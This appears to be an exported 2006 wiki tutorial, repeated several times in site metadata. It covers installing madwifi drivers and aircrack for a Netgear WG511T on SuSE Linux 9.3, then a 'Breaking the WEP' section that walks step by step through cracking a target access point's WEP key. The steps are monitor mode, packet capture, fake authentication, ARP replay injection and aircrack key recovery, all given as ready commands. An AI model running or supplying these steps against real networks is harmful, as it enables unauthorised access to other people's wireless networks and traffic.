<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/annotation/126/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="page" type="annotation" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/860/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="parent_guid" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[69]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/859/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="write_access_id" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[0]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1498/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[crack]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1497/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[wep]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1496/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[suse]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1495/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[wg511t]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1499/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[it security]]></metadata>
<entity uuid="http://www.divexit.de/export/opendd/70/" class="object" subclass="page" published="Thu, 11 Dec 2008 16:15:41 +0100" />
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/owner_uuid/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="owner_uuid" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[http://www.divexit.de/export/opendd/3/]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/container_uuid/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="container_uuid" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[http://www.divexit.de/export/opendd/3/]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/site_uuid/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="site_uuid" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[http://www.divexit.de/export/opendd/1/]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/time_updated/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="time_updated" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[1229953940]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/title/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="title" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[Installation manual for the WG511T on SuSE Linux 9.3 incl. WEP-Key breaking]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/description/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="description" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/volatile/renderedentity/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="renderedentity" type="volatile" ><![CDATA[	
	<div class="contentWrapper">	
	<div id="pages_page">
	
<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface:
<dl>
<dd> <strong>ifconfig ath0 down</strong> </dd>
</dl>
</li>
<li> Unload all old atheros modules:
<dl>
<dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd>
</dl>
</li>
<li> Delete all old atheros modules:
<dl>
<dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd>
<dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd>
</dl>
</li>
<li> Change to an installation directory of your choice (e.g. /usr/src/):
<dl>
<dd> <strong>cd /usr/src/</strong> </dd>
</dl>
</li>
<li> Download the necessary sources:
<dl>
<dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz"<a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" style="text-decoration:underline;">http:/<wbr />/<wbr />www.tuto-fr.com/<wbr />tutoriaux/<wbr />crack-wep/<wbr />fichiers/<wbr />wlan/<wbr />linux/<wbr />atheros/<wbr />madwifi-cvs-20051025.tgz</a></a></strong> </dd>
<dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch"<a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" style="text-decoration:underline;">http:/<wbr />/<wbr />www.tuto-fr.com/<wbr />tutoriaux/<wbr />crack-wep/<wbr />fichiers/<wbr />wlan/<wbr />linux/<wbr />patches/<wbr />madwifi-cvs-20051025.patch</a></a></strong> </dd>
<dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz"<a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" style="text-decoration:underline;">http:/<wbr />/<wbr />www.tuto-fr.com/<wbr />tutoriaux/<wbr />crack-wep/<wbr />fichiers/<wbr />wlan/<wbr />aircrack/<wbr />aircrack-2.41.tgz</a></a></strong> </dd>
</dl>
</li>
<li> Extract the sources and patch them:
<dl>
<dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd>
<dd> <strong>cd madwifi-cvs-20051025</strong> </dd>
<dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd>
</dl>
</li>
<li> Check your kernel-version:
<dl>
<dd> <strong>uname -r</strong> </dd>
</dl>
</li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"):
<dl>
<dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd>
<dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd>
</dl>
</li>
<li> Extract the aircrack packet:
<dl>
<dd> <strong>cd..</strong> </dd>
<dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd>
<dd> <strong>cd aircrack-2.41</strong> </dd>
</dl>
</li>
<li> Compile aircrack:
<dl>
<dd> <strong>make</strong> </dd>
<dd> <strong>make install</strong> </dd>
</dl>
</li>
<li> Reboot your system, insert the card and then load the new module with the following command:
<dl>
<dd> <strong>modprobe ath_pci</strong> </dd>
</dl>
</li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point):
<dl>
<dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd>
</dl>
</li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"):
<dl>
<dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd>
</dl>
</li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point):
<dl>
<dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd>
</dl>
</li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"):
<dl>
<dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd>
</dl>
</li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"):
<dl>
<dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd>
</dl>
</li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file:
<dl>
<dd> <strong> aircrack [PREFIX].cap</strong> </dd>
</dl>
</li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p> Author: Markus H.</p>
		<!-- display tags -->
		<p class="tags">
			<a rel="tag" href="http://www.divexit.de/pg/search/?q=wg511t&search_type=tags">wg511t</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=suse&search_type=tags">suse</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=wep&search_type=tags">wep</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=crack&search_type=tags">crack</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=it+security&search_type=tags">it security</a>		</p>
		

	<p class="strapline">
		Last updated <acronym title="22 December 2008 @ 2:52pm">22 December 2008</acronym> by <a href="http://www.divexit.de/pg/view/3">darklevel</a>	</p>
</div>

</div>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/annotation/20/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="page" type="annotation" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><a name="B000MQC8IO" href="http://amazon.de/gp/product/B000MQC8IO?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=B000MQC8IO&amp;adid=cca3b9f7-9427-46af-baba-31c665fefd65" target="_blank">SuSE Linux</a> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<table id="toc" class="toc" border="0" summary="Contents">
<tbody>
<tr>
<td>
<ul style="none;">
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#I.27m_using_the_following_hardware:"><span class="tocnumber">1</span> <span class="toctext">I'm using the following hardware:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#..and_the_following_software:"><span class="tocnumber">2</span> <span class="toctext">..and the following software:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#Packet_and_driver_installation:"><span class="tocnumber">3</span> <span class="toctext">Packet and driver installation:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#Breaking_the_WEP:"><span class="tocnumber">4</span> <span class="toctext">Breaking the WEP:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#Note:"><span class="tocnumber">5</span> <span class="toctext">Note:</span></a><br /><br /></li>
</ul>
<br /></td>
</tr>
</tbody>
</table>
<p>if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); }  <a name="I.27m_using_the_following_hardware:"></a></p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p><a name="..and_the_following_software:"></a></p>
